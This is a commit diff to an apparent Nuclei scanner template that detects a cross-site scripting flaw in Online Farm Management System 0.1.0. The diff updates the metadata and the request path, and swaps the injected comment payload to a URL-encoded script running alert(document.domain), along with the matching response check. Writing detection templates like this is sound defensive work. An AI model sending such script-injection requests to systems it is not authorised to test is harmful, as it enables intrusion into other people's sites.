Update onlinecms-xss.yaml

vulnerabilities/other/onlinecms-xss.yaml

@@ -1,23 +1,25 @@
 id: onlinefarmcms-xss
 
 info:
-  name: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
+  name: Online Farm Management System 0.1.0 - Cross-Site Scripting
   author: arafatansari
   severity: medium
-  reference:
-    - https://www.exploit-db.com/exploits/48673
   description: |
     Online Farm Management System is affected by Cross-Site Scripting on the review.php file.
-  tags: xss,,cms,persistent
+  reference:
+    - https://www.exploit-db.com/exploits/48673
+  metadata:
+    verified: true
+  tags: onlinefarm,cms,xss
 
 requests:
   - raw:
       - |
-        POST /agro/reviewInput.php?pid=1 HTTP/1.1
+        POST /reviewInput.php?pid=1 HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        comment=%3Cscript%3Ealert%281%29%3Cscript%3E&rating=0
+        comment=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&rating=0
 
     redirects: true
     max-redirects: 2
@@ -26,7 +28,7 @@ requests:
       - type: word
         part: body
         words:
-          - '<script>alert(1)</script>'
+          - '<em style="color: black;"><script>alert(document.domain)</script>'
 
       - type: word
         part: header